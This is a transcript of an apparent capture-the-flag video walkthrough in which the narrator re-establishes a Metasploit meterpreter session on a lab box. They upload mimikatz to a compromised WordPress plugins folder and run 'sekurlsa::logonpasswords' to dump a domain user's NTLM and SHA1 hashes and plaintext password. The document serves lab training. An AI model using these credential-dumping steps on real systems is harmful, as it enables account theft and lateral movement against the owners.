mimikatz to dump cached passwords, which means to dump them means to like chuck them, spit them out, throw them at us, and cached means they're in memory, recent memory kind of thing. Okay, so the first thing I'm doing here now is just to background that so that gets put back into session 2, and just check in pwd print working directory. We are in the shield folder, but the mimikatz.exe file is not in the shield folder. So I used locate again to see if I could find the mimikatz file, but I didn't type in .exe, so I don't think it is going to find it. It spits back some likely folders that it's in though. This one, user share .mimikatz, seems quite reasonable. So if we change directory to that, it might be in there. But I also thought I'd type in mimikatz.exe, and then this one probably looks more likely. User share Windows resources, which was in the list, just hidden within all the others. Where was it? Just trying to find it at this moment. Here it is. User share Windows resources /mimikatz. Then there's a /win32 version, and there's the /x64 version, which is like the 64-bit. I think the win32 might be the 32-bit, but we're going to use the x64-bit. Pretty much everyone will need to use that. Yeah, and if we change directory to that folder and then list what's in there, we can see the file mimikatz.exe does exist. It is in there. So we're going to copy that to our documents shield folder, so you can see it will be next to our netcat and juice files that we created or copied over earlier. Now you don't need to rename it. It seems like Windows Defender won't stop it. The PDF doesn't recommend renaming it, so it's probably fine. But I think I do rename it here just for giggles. So I used MV, then the name of the file, and then the name of the file that I wanted to call it, the new name. I wanted to call it now. And if we use dir within our MSF console and we're in the right folder, we can see, yeah, juice is there, cats is there, and nc.exe is there. So we're going to use the upload command, but not before switching back to the correct session. And I was a bit confused here because I typed in sessions 2 and it was like, oh, invalid session. I was like, well, is it number 1 then? No, invalid session. Or maybe it's session without the S. Unknown command. What happened was session 2 had died in the background, and it does say there, meter session 2 closed, reason died, but I just missed it, didn't see it. So I typed in run, and we're going to run the same exploit again. There you go, show sessions. You can see there's it's not there, it's been killed. So we're just going to run the exploit again, and we don't need to configure anything because it's already configured, ready to go. That'll create sessions number 3. Excuse me as I take a quick sip. And then we want to upload. Yeah, this is where I thought, can it upload to any file? So I tried uploading it to this location where we are now. So upload and the name of the file .exe, and lo and behold, it did work. It did upload. So you don't have to go to that uploads folder. You can just stay where you are, really. We just need to know. We need to make sure we know the real path address, because typing in, trying to execute it in the meterpreter like you see me do here doesn't work. Meterpreter doesn't understand /. // just means to run, basically, to execute. Maybe you could type in execute there. I'm not sure. So I'll go back to the netcat shell, which does understand /. The only problem is I don't know. I'm not in that directory where the file mimikatz is, so we have to use a bit of cd to work our way through. I know it was in the WordPress, and then I thought it was in WP admin for some reason, when I should have remembered it was in WP content. So you'll see me now going into the admin, getting lost in here, thinking, whoa, I remember all these. It wasn't in one of these, was it? And that's when I just double checked. It's in WP content, not WP admin directory. So we can use cd ... to back up a directory. cd WP / content. Not slash, dash. Here we are. And then we're going to be in the plugins. And then I was a bit confused, like, where is it? It's not there. Then I remembered it's within that newly created folder that we made, which had a random string of letters. RIGMICOCME. So I just CD to that one. Plugins. There it is. Yeah. And when we get into this folder, we're going to be doing the ./mimikatz.exe to run it, to start the executable. And then it's going to come up with like a little banner, because we are going to be in the file, so to speak. Here you are. Look, we have a Mimikatz command line, and we're just going to type in SEKURLSA, Securulsa, then : and then logon passwords, and it will dump all these cached passwords. A lot of them, as you can see, they were kind of null. They'll say null. And it seems to be that there are some hashes. I'd say if this was, for real, you would copy and paste the whole thing, but we don't need to do that. We just need Sandra's login credentials for next time. So there you go. There's NTLM, which I know is a type of exploit that we take advantage of in Pathfinder, and SHA1, SHA1, which is a hashed password. And there you go. There's Sandra. Domain megacore, so we get the domain name, megacore.local. We get some of her kind of hashed passwords, but then we get her password as well. Password 1234 ! Capital P. So if this were real, you would copy and paste that and keep that as a credential that could possibly be exploited in a future attack. Well, that's pretty much the end of the video. Thank you for watching. I hope it was informative, and if you were stuck on this box, I hope that this video has shown you that probably one little thing that you kind of missed. But again, that's, everyone gets stuck at different places. But I've tried to be thorough. I've tried to be as thorough as I can so that everybody can understand what's going on. And if the PDF walkthrough wasn't quite telling you exactly how to do something, I hope that my video is showing you how to do that. For example, like at one point, the author of the PDF writes LCD for local change directory or something, and that command doesn't work. Whether I don't know whether that's a mistake on the author's part, or if it's been like updated. MSF console was updated, and that command no longer is accepted. But that's one little thing, for example, where people could be stuck. That's it, really. So you can just see me now closing everything. I'm going to restore my machine back to the first snapshot anyway. So everything that I've done is going to be forgotten, essentially. So I can just close these down. I'm going to make a video on the next box as soon as I can, as soon as I've managed to crack it myself, and I can record my commentary over it. I'll get that uploaded, which shouldn't take too long, and then when I'm done in a few weeks or so, I should have a nice series. So yeah, thank you for watching.